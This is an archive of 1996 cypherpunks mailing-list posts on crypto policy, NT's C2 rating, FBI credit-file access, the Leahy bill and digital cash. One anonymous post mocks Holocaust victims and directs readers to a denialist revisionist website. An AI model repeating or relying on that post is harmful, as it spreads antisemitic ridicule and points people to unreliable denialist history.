>        for example a true OTP,  and in those cases, they may 
>        "theoretically" be more difficult to break than the IPG Ultima 
>        System, for example a true OTP. However, that would exist only in 
>        theory, because in those eventiualities, none of the 
>        systems would be breakable.

I wonder what Lord British (of the famed Ultima computer game series) would
have to say about the trademark of this name?  (Not to mention the
incredible run-on sentence...)

The more I read their prose, the more I think that they must be
experimenting with ergotic chemistry on the side.
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 21 Mar 1996 22:03:24 +0800
To: cypherpunks@toad.com
Subject: Re: A MODEST PROPOSAL
Message-ID: <199603211212.NAA22651@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



On Wed Mar 20 1996 Sandy Sandfort wrote:

: Having said that, I am totally put off by the gradiose and
: devisive ravings of this commentator.  During the Second World
: War the Nazis required Jews in the occupied countries to wear a
: yellow star of David to identify themselves.  In Denmark, the
: king so identified himself, and soon so did most of his subjects.

Ohh pleeez!!, give YOUR ravings a rest
Next you'll be raving about soap and lampshades made out of Jews.

The story about the Danish King and the Yellow star is a famous wartime
lie by the US.  When Germany invaded Denmark and Norway, the king of
Norway fled to London to continue resistance.  The king of Denmark
surrendered.  Many in the US thought the Danish king was a coward.
During the war the story  about the yellow star was made up to make the
king look better.

For more details try out IHRs web site on http://www.kaiwan.com/~ihrgreg.


A recent article from a British on-line newspaper:-

The Electronic Telegraph Tuesday 29 August 1995

Denmark's resistance to Nazis 'is a myth'

By John Keegan, Defence Editor

DANISH resistance to German occupation during the Second World War is largely
a myth, according to a leading historian.

The civilian population was not involved in resistance and the celebrated
rescue of Denmark's Jews from Nazi deportation was facilitated by the German
occupiers themselves. Those caught assisting the Jews' escape were either not
punished or else given nominal prison sentences.

These astonishing claims were made by Prof Henning Poulsen, of Aarhus
University, at a conference on "The Second World War as Myth and History"
held in the Swedish Houses of Parliament. The conference was opened by the
Swedish foreign minister, Lena Hjelm-Wallen, and closed by the speaker of
the Swedish parliament, Birgitta Dahl.

Prof Poulsen insisted that his views were not controversial, a view supported
by another Danish professor. The official story of the resistance was, he
said, no longer accepted by most young Danes, who found it exaggerated and
boring. He reminded his audience of fellow historians from Norway, Sweden,
Finland, Iceland, Russia, Canada and Germany that Denmark capitulated on the
day of the German invasion, May 9, 1940, and was not treated by Germany as a
conquered nation.

The elected government remained in office and German officials belonging to the
administration in Copenhagen made visits to Danish ministers, not vice versa.

Danish political parties were allowed to function normally and to maintain
democratic debate. The only limitation on their activities was that criticism
of Germany was not permitted.

The occupation remained a benign one.

Werner Best, the SS officer representing the German foreign office, did not
wear his black uniform and was not allowed by Himmler to use his high SS rank
title. The foreign office was the agency chosen by Hitler to represent German
power in Denmark during the occupation.

After August 1943, when there were riots in Copenhagen following misbehaviour
by German troops, conditions worsened, said Prof Poulsen.

The Germans dissolved the elected government and imposed direct administration.
Nevertheless, he said, the occupation remained a benign one.

Danish civilian rations were more generous than those in Germany and when
German police were called on to put down demonstrations in Danish cities they
did so under the regulations governing police response to civil disorder in
Germany.

In his most sensational revelation, he said that the only concentration camp
set up by the Germans on Danish soil, at Froesley, never held more than 4,000
inmates, 2,000 fewer than it was designed to contain.

Denmark "won a war in which it had not taken part"

It was administered by the Danish prison service and was the only concentration
camp in the Nazi system where the German guards asked for the same food as the
prisoners. It was ironic, Prof Poulsen said, that Denmark was included among
the victor nations in 1945 by Britain, America and the Soviet Union. It had
thus "won a war in which it had not taken part".

Prof Poulsen conceded that there had been resistance in Denmark, but of a
military, not civilian, character.

By that he appeared to mean that sabotage operations against the Germans were
the acts of unrepresentative groups, working in co-operation with the British
Special Operations Executive, and did not represent the attitude of the
majority of the population.

Prof Poulsen's paper is likely to provoke argument, particularly in Britain,
America and Israel, where the Danish success in arranging the escape of 95 per
cent of the country's 7,000 Jews to neutral Sweden in September, 1943, is
hailed as an example of what might have been achieved elsewhere had domestic
populations shown the same determination.

He suggested that the escape succeeded because the Germans did not try to
prevent it and because the worst penalty visited on those fishermen who were
caught after smuggling Jews abroad was three months' imprisonment.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody <nobody@c2.org>
Date: Fri, 22 Mar 1996 08:47:22 +0800
To: cypherpunks@toad.com
Subject: Happy shiny censors holding hands
Message-ID: <199603212128.NAA22325@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


McPaper USA Editorial, March 21st, 10A:

Racism on the Net

Even in the wildest reaches of the Internet, where anything goes
and most things have gone at least twice, the flow of free
information is sometimes at risk.

Take this ugly battle: on one side, a band of racists wants a
formal place on the Net to discuss "white power" music. On the
other, a cadre of Internet users believes white power deserves
no such setting.

At risk is the wondrous anarchy of the Internets newsgroups.
These exist by the thousands in an Internet subject called
Usenet, where they are divided in two.

In the "alternative" category, newsgroups careen about
essentially without limits. In the other, qualified newsgroups
are organized into eight subject "hierarchies": politics,
science, etc. Membership in these is preferred because, for the
most part, these hierarchies are carried by the Internet's
networks without question.

In this case, a fan proposed that the "recereation" hierarchy,
which includes music sections, add a white-power newsgroup. This
would put the music -- and its central tenets -- smack in the
middle of the Net.

Then the fight commenced. Although the Usenet contains no real
structure, it is self-regulating. Newsgroups proposed for a
hierarchy are subject to a discussion period and then balloting
by interested Netizens.

In this case, opponents argued that white-power advocates
should hold their discussions in one of the "alternative"
newsgroups; that the hierarchies constituted a special garden in
the Net's "village green"; and that white-power music deserved
no bench there.

To be sure, racism deserves neither respect nor credibility. But
in this case, exclusion may have unintended results.

If offensive ideas by themselves are a basis for exclusion, then
who else should be locked out? Some would make the same argument
against the hip-hop and music-poetry newsgroups, where harsh and
violent rap lyrics may be discussed.

Without their own newsgroup, the white-power devotees will only
contaminate other newsgroups with their static. Give them a lair
to call their own, and at least you know where not to tread.

There are advantages to Usenet's ad hoc self-governance. It helps
protect the system from outsiders seeking to control its
carbonated anarchy. But if the system then turns against speech,
the result is the same: Free exchange of ideas is constricted.
Even in the ether -- especially in the ether -- that's something
to beware.

We Gungir Din





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Fri, 22 Mar 1996 06:26:39 +0800
To: cypherpunks@toad.com
Subject: New FBI Spy
Message-ID: <199603211946.NAA05879@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


Wall Street Journal, 21 March 1996

New FBI Access To Credit Files Raises Concern

By Vanessa O'Connell

Consumer-rights advocates are sounding alarms about a new
law giving the Federal Bureau of Investigation easier
access to credit-report information.

The little-noticed law enacted in January as part of the
Intelligence Authorization Act of 1996, allows FBI
officials to obtain key information from a person's
credit file without seeking a judge's permission.

Investigators still need a court order or a federal
grand jury subpoena to view someone's full credit report.

But they can get basic information with only written
authorization from the head of the FBI or his designee if
there's reason to suspect a person is a spy or terrorist
or has had contact with one. The basic information
available under the new law includes a person's
employment history, addresses, and a list of lenders and
other financial institutions with which the person has or
had relationships.

To avoid tipping off suspects to an investigation, the
new law also requires credit bureaus to keep secret any
FBI request to review a credit report.

Privacy and civil-rights experts say the law raises
numerous privacy concerns and leaves individuals
vulnerable. "The court-order warrant procedure is a major
protection of individual rights and it ought not be
suspended," said Alan F. Westin, professor of public law
and government at Columbia University.

Gregory Nojeim, legislative counsel for the American
Civil Liberties Union, complained that "all the FBI would
have to do is make a secret letter request to a credit
bureau based on secret FBI determinations."

"It's appalling," said David Banisar, a policy analyst at
the Electronic Privacy Information Center, a Washington
nonprofit public-interest group promoting better privacy
laws.

In the past, the FBI sometimes pulled credit reports in
criminal cases, but rarely looked at the credit files of
individuals it was secretly investigating as suspected
spies or terrorists. Before the new law, an FBI request
for credit information had to be listed in an
individual's file along with the names of lenders or
potential employers that asked to review the report.

Because FBI officials can now peek at credit reports in
secret, they're more likely to use the files to nab
suspected spies and terrorists, a Justice Department
official said. At the same time, the official said, it is
less likely that FBI agents will go to the trouble of
obtaining a person's full credit record, including the
status of any current accounts.

-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Loysen <dwl@hnc.com>
Date: Fri, 22 Mar 1996 19:42:56 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
Message-ID: <199603212223.OAA01460@spike.hnc.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:54 PM 3/21/96 EST, you wrote:
>> configuration can be certified as C2 compliant. The way I read the orange
>> book, no system with a network connection can ever be C2. For that matter a
>> system can't get C2 unless it is in an area where you can control and
>> monitor physical access to the system.
>
>This is incorrect -- you can have a C2 system which has a network
>connection.  Indeed, you can get a B2 rating with a networked system,
>c.f. Multics.
>
>-derek
>
>
>
Well,  I never argue with anyone from MIT..... But.

I don't see any reason a C2 or B2 system can't be networked to another
system(s) with the same classification. But that isn't really what I meant.
Can you make a firewall system that is C2 compliant? Isn't this what you
would need in order to connect a C2 system or network to another non secure
network, (i.e. the internet)?

I do agree that there is no place in the orange book that says "thou shall
not speak ethernet" but can you network a system and be able to "require
that ADP systems that process, store, or use classified data and produce
classified information will, with reasonable dependability, prevent
delibrate or inadvertent access to classified material by unauthorized
persons, and unauthorized manipulation of the computer and its associated
peripheral devices." Which the orange book does say.

I guess "reasonable dependability" is a pretty broad term.

Pardon a newbie here if I am being unusally obtuse, but you can't learn if
you don't ask.


dwl@hnc.com		
David Loysen		
619-546-8877 x245		
			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey Smith <sthjyq@amp.com.au>
Date: Thu, 21 Mar 1996 17:43:37 +0800
To: cypherpunks@toad.com
Subject: NEW SUBSCRIBER
Message-ID: <3151E943.5D7@amp.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Hi, In my profession (auditing) I endeavour to keep abreast of the latest 
vulnerabilities of the systems I audit.  I would like to be on mailing 
lists for Novell, AS/400, NT and UNIX security exposures.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 22 Mar 1996 08:05:58 +0800
To: David Loysen <dwl@hnc.com>
Subject: Re: NT's C2 rating
In-Reply-To: <199603211813.KAA15750@spike.hnc.com>
Message-ID: <9603212054.AA24580@portnoy.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> configuration can be certified as C2 compliant. The way I read the orange
> book, no system with a network connection can ever be C2. For that matter a
> system can't get C2 unless it is in an area where you can control and
> monitor physical access to the system.

This is incorrect -- you can have a C2 system which has a network
connection.  Indeed, you can get a B2 rating with a networked system,
c.f. Multics.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Fri, 22 Mar 1996 20:49:30 +0800
To: cypherpunks@toad.com
Subject: A funny story
Message-ID: <3151EE5C.F4E@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I was driving on the Foothill Expressway in Palo Alto today when
I came to a stop at a light. I glanced over at the car next to me 
and noticed that someone had left thier keys in the door lock. 
 So being the good cypherpunk that I am I jumped out and grabbed the 
keys from the lock, then knocked on the window. The passenger rolled 
down the window and accepted the keys back. Much to my surprise the 
passenger was none other than Whitfield Diffie.
 Very goofily I exclaimed, "aren't you Whifield Diffie!?". "Yes, who 
are you", was the reply. "I'm a cypherpunk", I retorted. I'm not 
sure his exact reply by I think it was along the "excellent" lines. 
I got handshakes from he and his driver.
-- 

-----------------------------------------------------------------
"When they came for the Fourth Amendment I didn't say anything 
because I had nothing to hide.
  When they came for the Second Amendment I didn't say anything 
because I wasn't a gun owner.
  When they came for the Fifth and Sixth Amendments I didn't say 
anything because I had
  committed no crimes. When they came for the First Amendment I 
couldn't say anything."

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 22 Mar 1996 20:36:59 +0800
To: cypherpunks@toad.com
Subject: Re: NT's C2 rating
In-Reply-To: <199603211813.KAA15750@spike.hnc.com>
Message-ID: <Pine.SCO.3.91.960321172412.18669A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Mar 1996, David Loysen wrote:

> Ain't nothing fine about that print. An operating system or piece of
> hardware may be C2 certifiable. But only a complete system in a specific
> configuration can be certified as C2 compliant. The way I read the orange
> book, no system with a network connection can ever be C2. For that matter a
> system can't get C2 unless it is in an area where you can control and
> monitor physical access to the system.

I have to disagree.  C2 most certainly can be given to a network product.  
That's why we have the TNI (Trusted Network Interpretation) of the 
criteria.  There are actually A1 network products on the EPL.  I've 
personally worked on both C2 and B1 network and database product 
evaluations, for example.

Also, evaluation is given to commercial products, not "complete 
systems."  A complete system goes through certification and 
accreditation, not evaluation against the Criteria.

Also, the physical security measures make no difference in regard to a C2 
rating.  A product can be C2 whether it's in a kiosk in a shopping mall, 
or inside of a SCIF.  The over-all security policy of the system dictates 
the right mix of software countermeasures (C2, B1, B2, ,etc.) and the 
physical countermeasures (public, locked room, not networked, in a SCIF).  
Normally, as you boost one side of the equation, you can lower the other.

In short, the criteria is used to rate the level of trust that can be 
placed in a given commercial product.  Sort of like a UL rating.  Once 
you buy it, though, the security posture in which you operate it is up to 
you.

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 22 Mar 1996 20:36:23 +0800
To: cypherpunks@toad.com
Subject: C2 rating of NT
Message-ID: <Pine.SCO.3.91.960321173452.18669B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 21 Mar 1996 08:09:14 -0500 (EST)
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
To: owner-cypherpunks@toad.com
Subject: Re: your mail

On Wed, 20 Mar 1996 owner-cypherpunks@toad.com wrote:

<snip>

> 
> Basically, I'm now questioning the C2 rating of Windows NT.  The 
> entire security layer is  modular to the Kernel.  As a modular 
> driver, it can be removed, rewritten, and replaced.   
> 
> So, what makes it secure?  What gives it the C2 Rating?  How would 
> one go about getting a C2 rating?

Politics make it C2.  The DoD mandated, years ago, that all their OSs had 
to go to the C2 level of trust.  Further, they had also mandated POSIX 
compliance in just about every procurement that they had to publish in CBD.

Well, they then proceeded to ignore their own policy and they bought MS 
DOS all over the damn place because everyone wanted the stuff just like 
they have at home.  You can't play DOOM on SCO UNIX, ya know...

So, in order to not look like a bunch of incoherent IRM loosers, they 
effectively forced the C2 and POSIX compliance stickers onto Windows NT 
even though everyone (including some nameless NCSC personnel with whom 
I've spoken) clearly state that C2/POSIX and MS Windows NT is an 
oxymoron.  Now everyone can claim to be running C2 and POSIX systems, 
even though, by admission of MS, you can't have NT configured for both at 
the same time.

Duhhhhhh...  

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Rothke <ben.rothke@citicorp.com>
Date: Fri, 22 Mar 1996 16:18:41 +0800
Subject: NT's C2 rating
Message-ID: <199603212246.AA33083@egate.citicorp.com>
MIME-Version: 1.0
Content-Type: text/plain



>>The fine print says its insecure as soon as its connected to a network. 

Try running the C2config.exe found in the 3.51 resource kit, Should NT detect that you have 
network connectivity during the C2 test, you will get the following error message: "C2 
compliance requires that no networking software be installed on your system.  One or more 
network services have been detected on your system.  Select OK to use the Network Control Panel 
Applet to remove these services.   If you click on Help, you will get the following bit of 
information: Windows NT networking services were not included in the NCSC C2 evaluated 
configuration.  For your system to conform to the evaluated C2 configuration, the network 
services must be removed or disabled.  Should you click on OK, if you are on a NT workstation, 
you have just disconnect yourself from the network.  If you ran the test on a server, you have 
just shut down your network.

 

-------------------------------------
Ben Rothke
Citicorp Global Information Network
NY, NY
"Views expressed are exclusively my own & not of my employer"
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 22 Mar 1996 20:36:12 +0800
To: unicorn@schloss.li
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <01I2LXKYBUUW8ZDWFS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I believe the debate about the Leaky bill can essentially be summarized
as:
	A. If the bill is interpreted in light of the Bill of Rights, et al,
then we don't have anything to worry about, and it's a good bill.
	B. If it's not, then it's a bad bill.

	I would like to remind people that the US judicial system, while not as
always mistaken as some believe, is not particularly noted for not making
serious errors in this area. For instance, regarding the forfeiture scheme,
quite a few competent lawyers have examined civil forfeiture - used for _any_
crime - and found it to be a violation of the Bill of Rights.
	Moreover, it is the contention of many lawyers - such as with the
ACLU - that the whole ITAR scheme should have been thrown out long ago as
unconstitutional. That it has not been so may be taken as an indication of how
the _politically appointed_ judges on the Supreme Court, et al, are likely to
make mistakes. I would also remind you of the ratings given by the American
Bar Association to quite a few current judges on the Supreme Court, which may
be taken as a reflection of their competency.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Fri, 22 Mar 1996 20:23:33 +0800
To: jamesd@echeque.com
Subject: Re: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <199603211619.IAA27641@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.91.960321180535.24730A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Mar 1996 jamesd@echeque.com wrote:

> At 05:31 AM 3/21/96 -0500, dirsec wrote:
> > I think Leahy will, quite rightly, refuse to adopt the new bill because 
> > it has a snowball's chance in hades of passing, and it makes him look 
> > soft on crime and terrorists.
> 
> Hold it:  Backup:  Opponents of the bill say it says X:  Supporters of the 
> bill say it says Y:  The proposal is to rewrite the bill so it actually 
> does say Y in plain english.  And you (quite correctly) say that the bill
> will not pass if says Y.

It's even deeper than this really.  Opponents of the bill say it says X.  
Supporters of the bill say it says Y.  The bill actually sounds more like 
X than Y.  There is very little incentive to make the bill anything like 
Y.  The bill could probably be a straight forward X and still pass.

> 
> You are right.
> 
> The bill does not facilitate crypto exports, it just sounds like it does, 
> and it delegates judicial powers to cops.

Well, it facilitates them, but it takes with the other hand at the same 
time.  It does not facilitate strong unescrowed crypto exports.

> If it was amended to facilitate crypto exports, and to maintain the 
> separation of judiciary and executive, it would not pass.

If it was just amended to facilitate crypto exports, it would not pass.

>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Fri, 22 Mar 1996 14:16:52 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Key-Signing at Networld
Message-ID: <2.2.32.19960321231222.0071baa0@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


Planning on attending Netoworld / Interop?
Want to connect your PGP public key ring to San Diego?

If so... Send me an e-mail before 3/29/96 and we will create a meeting
place.  Best time for me will be Monday night (4/1/96).

I can be reached during the show (via my newton so don't mail bomb me) at
76340.2422@compuserve.com

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 22 Mar 1996 11:34:38 +0800
To: cypherpunks@toad.com
Subject: DIO_fan
Message-ID: <199603212327.SAA24806@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Sciences, March/April, 1996:

   "Beyond the Last Theorem."
   
   On Diophantine equations, by mathematician Dorian Goldfeld.

      To mathematicians, the statement and proof of the STW
      conjecture were as revolutionary as the first mingling
      of waters in the Panama Canal. Until that point, the
      mathematics of elliptic functions and the mathematics of
      rigid motions had developed in isolation from each other
      and in strikingly different ways. The study of elliptic
      curves was a branch of number theory, small, specialized
      and provincial -- not unlike the study of Diophantine
      equations. In contrast, the study of rigid motions was
      a bustling, sophisticated suburb of topology, geometry
      and analysis, with many applications to engineering and
      physics. Mathematicians had been working on rigid
      motions intensely for a hundred years and had
      accumulated a vast armamentarium of powerful
      mathematical machinery. By suggesting that the two
      fields could be linked, Shimura, Taniyama and Weil
      delivered that heavy machinery to the construction site
      of elliptic curves; by proving that the link held, Wiles
      and Taylor started the engines. The result has been a
      frenzy of productive mathematical work that has
      benefited each field and is likely to lead to solutions
      of outstanding problems in other fields as well. ...

      If the ABC conjecture yields, mathematicians will find
      themselves staring into a cornucopia of solutions to
      long-standing problems. Some of those problems are of
      more than theoretical interest. Nowadays many methods of
      ensuring the security of electronic mail and other
      computerized transactions depend heavily on number
      theory, as programmers develop ciphers based on
      time-consuming problems in arithmetic. For example, a
      highly popular technique depends on the difficulty of
      determining all the large prime factors of a very large
      number.

      In principle, it should also be straightforward to
      create a cipher based on the difficulty of solving
      problems in Diophantine analysis. The major hurdle is
      the solvability barrier: the number of variables above
      which a Diophantine equation becomes impervious to
      attack. Any cipher based on an equation with that many
      variables should be absolutely secure. But where is the
      threshold? All anyone knows is that it probably lies
      between three and nine variables. At current or
      foreseeable processing speeds, a nine-variable cipher is
      impracticably slow, even for the fastest computers. A
      four-variable Diophantine cipher, however, would be both
      practical and extremely useful.

   
   DIO_fan (35 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 22 Mar 1996 14:53:31 +0800
To: "E. ALLEN SMITH" <stewarts@ix.netcom.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <v02120d00ad77bf00673f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:26 3/21/96, E. ALLEN SMITH wrote:
>From:   IN%"stewarts@ix.netcom.com"  "Bill Stewart" 16-MAR-1996 01:55:32.07
>
>>Depending on the details of Ian's method, I don't think the debate
>>needs to be taken to the public, or even done - it may simply be a
>>done deal once the technology's out there.  If Mark Twain Bank or
>>Merita Bank or the Federal <Exonive-Deleted> Reserve wants to offer
>Digicash(tm) with Payee-Non-Anonymity, they can always make it a contractual
>>requirement that their payees not use anonymity techniques in return for
>>being paid.
>
>        Wouldn't the viability of such a clause depend on the anonymizing
>scheme in question? If the bank's cooperation isn't needed (i.e., going through
>a proxy), then such a limit would be empty.

It is true that the issuer is unable to discover that double blinding is
being used. The real problem with the protocol is that it requires
payor/payee collusion, which may make it difficult to execute.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 23 Mar 1996 04:10:08 +0800
To: cypherpunks@toad.com
Subject: Medical Privacy List
Message-ID: <01I2LZ863OJA8ZDWL7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 14-MAR-1996 00:33:07.87

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 13 Mar 1996 14:50:40 -0500 (EST)
From: James Love <love@Essential.ORG>
Subject: Re: medical privacy list

[...] the list is called med-privacy.  Subscriptions are open, from
listproc@essential.org.  The one line subscription request is
   
   subscribe med-privacy yourfirstname yourlastname

It is an unmoderated discussion about medical privacy legislation.  
Traffic is moderate.  Archives at available at:
 
 http://www.essential.org/listproc/med-privacy/

  best, jamie

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
James Love / love@tap.org / P.O. Box 19367, Washington, DC 20036
Voice: 202/387-8030; Fax 202/234-5176
Center for Study of Responsive Law
   Consumer Project on Technology; http://www.essential.org/cpt
   Taxpayer Assets Project; http://www.essential.org/tap
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Mar 1996 13:10:28 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Enquirer Request
Message-ID: <ad773fd20a0210046bf1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:13 PM 3/21/96, Andrew Loewenstern wrote:
>Would some kind soul please forward to me a copy of the latest Cypherpunk
>Enquirer?  My filter mistakenly tossed the last copy and the archive at
>hks.net is still down.

I just did this. Hilarious stuff. Interesting that no one complains about
this use of anonymity!

(By the way, with 1000+ subscribers, a "would some kind soul" request is
possibly a dangerous thing to request. Game theory has some advice about
rolling dice, etc., but I doubt this works well.)

>(who should probably rewire his filter to toss messages into a temporary
>'holding tank')

Indeed, with Eudora (for the Mac and Windows), I filter offending messages
into a file I call "Kill," though it is persistent and can be perused at
any time. With the traffic having gotten lighter these last couple of
weeks, I confess to looking at it more often.

Some messages I "delete," which Eudora moves to a Trash file...and STILL
doesn't delete the messages until the Trash is explicitly emptied! Lots of
layers of protection. (Though I confess there have been times when I got an
insulting or infuriating item in the mail and decided to remove all
temptation to reply by immediately trashing it and then giving the command
"Empty Trash." At this point, only a determined effort with Norton
Utilities or the like could have any hope of recovering the deleted stuff.
A a post offends thee, pluck it out.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 22 Mar 1996 12:52:32 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <ad7742100b021004f2ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 PM 3/21/96, E. ALLEN SMITH wrote:

>        I would like to remind people that the US judicial system, while not as
>always mistaken as some believe, is not particularly noted for not making
>serious errors in this area. For instance, regarding the forfeiture scheme,
>quite a few competent lawyers have examined civil forfeiture - used for _any_
>crime - and found it to be a violation of the Bill of Rights.

And yet civil forfeiture continues, in a big way, There are entire police
departments who count on civil forfeiture to supply them with cars, boats,
planes, helicopters, and who count on sales of seized assets to fund their
departments.

(From the yachts seized in Dade County to the killing of a retired doctor
who had land in Malibu desired by the cops, the civil forfeiture situation
is grim.)

>        Moreover, it is the contention of many lawyers - such as with the
>ACLU - that the whole ITAR scheme should have been thrown out long ago as
>unconstitutional. That it has not been so may be taken as an indication of how

By the way, it was also the opinion of lawyers within the NSA that a real
test of the ITARs in court should be avoided because they would likely be
